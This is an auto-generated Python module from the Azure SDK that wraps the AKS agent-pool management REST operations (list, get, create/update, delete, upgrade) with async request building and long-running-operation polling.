from ...operations._agent_pools_operations import build_create_or_update_request_initial, build_delete_request_initial, build_get_available_agent_pool_versions_request, build_get_request, build_get_upgrade_profile_request, build_list_request, build_upgrade_node_image_version_request_initial
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class AgentPoolsOperations:
"""AgentPoolsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.containerservice.v2022_01_02_preview.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace
def list(
self,
resource_group_name: str,
resource_name: str,
**kwargs: Any
) -> AsyncIterable["_models.AgentPoolListResult"]:
"""Gets a list of agent pools in the specified managed cluster.
Gets a list of agent pools in the specified managed cluster.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource.
:type resource_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either AgentPoolListResult or the result of cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.containerservice.v2022_01_02_preview.models.AgentPoolListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.AgentPoolListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
template_url=self.list.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("AgentPoolListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools'} # type: ignore
@distributed_trace_async
async def get(
self,
resource_group_name: str,
resource_name: str,
agent_pool_name: str,
**kwargs: Any
) -> "_models.AgentPool":
"""Gets the specified managed cluster agent pool.
Gets the specified managed cluster agent pool.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource.
:type resource_name: str
:param agent_pool_name: The name of the agent pool.
:type agent_pool_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: AgentPool, or the result of cls(response)
:rtype: ~azure.mgmt.containerservice.v2022_01_02_preview.models.AgentPool
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.AgentPool"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
template_url=self.get.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('AgentPool', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}'} # type: ignore
async def _create_or_update_initial(
self,
resource_group_name: str,
resource_name: str,
agent_pool_name: str,
parameters: "_models.AgentPool",
**kwargs: Any
) -> "_models.AgentPool":
cls = kwargs.pop('cls', None) # type: ClsType["_models.AgentPool"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(parameters, 'AgentPool')
request = build_create_or_update_request_initial(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
content_type=content_type,
json=_json,
template_url=self._create_or_update_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('AgentPool', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('AgentPool', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}'} # type: ignore
@distributed_trace_async
async def begin_create_or_update(
self,
resource_group_name: str,
resource_name: str,
agent_pool_name: str,
parameters: "_models.AgentPool",
**kwargs: Any
) -> AsyncLROPoller["_models.AgentPool"]:
"""Creates or updates an agent pool in the specified managed cluster.
Creates or updates an agent pool in the specified managed cluster.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource.
:type resource_name: str
:param agent_pool_name: The name of the agent pool.
:type agent_pool_name: str
:param parameters: The agent pool to create or update.
:type parameters: ~azure.mgmt.containerservice.v2022_01_02_preview.models.AgentPool
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either AgentPool or the result of
cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.containerservice.v2022_01_02_preview.models.AgentPool]
:raises: ~azure.core.exceptions.HttpResponseError
"""
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.AgentPool"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
parameters=parameters,
content_type=content_type,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('AgentPool', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}'} # type: ignore
async def _delete_initial(
self,
resource_group_name: str,
resource_name: str,
agent_pool_name: str,
**kwargs: Any
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_delete_request_initial(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
template_url=self._delete_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}'} # type: ignore
@distributed_trace_async
async def begin_delete(
self,
resource_group_name: str,
resource_name: str,
agent_pool_name: str,
**kwargs: Any
) -> AsyncLROPoller[None]:
"""Deletes an agent pool in the specified managed cluster.
Deletes an agent pool in the specified managed cluster.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource.
:type resource_name: str
:param agent_pool_name: The name of the agent pool.
:type agent_pool_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
if polling is True: polling_method = AsyncARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}'} # type: ignore
@distributed_trace_async
async def get_upgrade_profile(
self,
resource_group_name: str,
resource_name: str,
agent_pool_name: str,
**kwargs: Any
) -> "_models.AgentPoolUpgradeProfile":
"""Gets the upgrade profile for an agent pool.
Gets the upgrade profile for an agent pool.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource.
:type resource_name: str
:param agent_pool_name: The name of the agent pool.
:type agent_pool_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: AgentPoolUpgradeProfile, or the result of cls(response)
:rtype: ~azure.mgmt.containerservice.v2022_01_02_preview.models.AgentPoolUpgradeProfile
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.AgentPoolUpgradeProfile"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_upgrade_profile_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
template_url=self.get_upgrade_profile.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('AgentPoolUpgradeProfile', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_upgrade_profile.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}/upgradeProfiles/default'} # type: ignore
@distributed_trace_async
async def get_available_agent_pool_versions(
self,
resource_group_name: str,
resource_name: str,
**kwargs: Any
) -> "_models.AgentPoolAvailableVersions":
"""Gets a list of supported Kubernetes versions for the specified agent pool.
See `supported Kubernetes versions
<https://docs.microsoft.com/azure/aks/supported-kubernetes-versions>`_ for more details about
the version lifecycle.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource.
:type resource_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: AgentPoolAvailableVersions, or the result of cls(response)
:rtype: ~azure.mgmt.containerservice.v2022_01_02_preview.models.AgentPoolAvailableVersions
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.AgentPoolAvailableVersions"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_available_agent_pool_versions_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
template_url=self.get_available_agent_pool_versions.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('AgentPoolAvailableVersions', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_available_agent_pool_versions.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/availableAgentPoolVersions'} # type: ignore
async def _upgrade_node_image_version_initial(
self,
resource_group_name: str,
resource_name: str,
agent_pool_name: str,
**kwargs: Any
) -> Optional["_models.AgentPool"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.AgentPool"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_upgrade_node_image_version_request_initial(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
template_url=self._upgrade_node_image_version_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
response_headers = {}
if response.status_code == 202:
response_headers['Azure-AsyncOperation']=self._deserialize('str', response.headers.get('Azure-AsyncOperation'))
deserialized = self._deserialize('AgentPool', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
_upgrade_node_image_version_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}/upgradeNodeImageVersion'} # type: ignore
@distributed_trace_async
async def begin_upgrade_node_image_version(
self,
resource_group_name: str,
resource_name: str,
agent_pool_name: str,
**kwargs: Any
) -> AsyncLROPoller["_models.AgentPool"]:
"""Upgrades the node image version of an agent pool to the latest.
Upgrading the node image version of an agent pool applies the newest OS and runtime updates to
the nodes. AKS provides one new image per week with the latest updates. For more details on
node image versions, see: https://docs.microsoft.com/azure/aks/node-image-upgrade.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource.
:type resource_name: str
:param agent_pool_name: The name of the agent pool.
:type agent_pool_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either AgentPool or the result of
cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.containerservice.v2022_01_02_preview.models.AgentPool]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.AgentPool"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._upgrade_node_image_version_initial(
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response_headers = {}
response = pipeline_response.http_response
response_headers['Azure-AsyncOperation']=self._deserialize('str', response.headers.get('Azure-AsyncOperation'))
deserialized = self._deserialize('AgentPool', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_upgrade_node_image_version.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}/upgradeNodeImageVersion'} # type: ignore
| 46.310292 | 291 | 0.68104 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.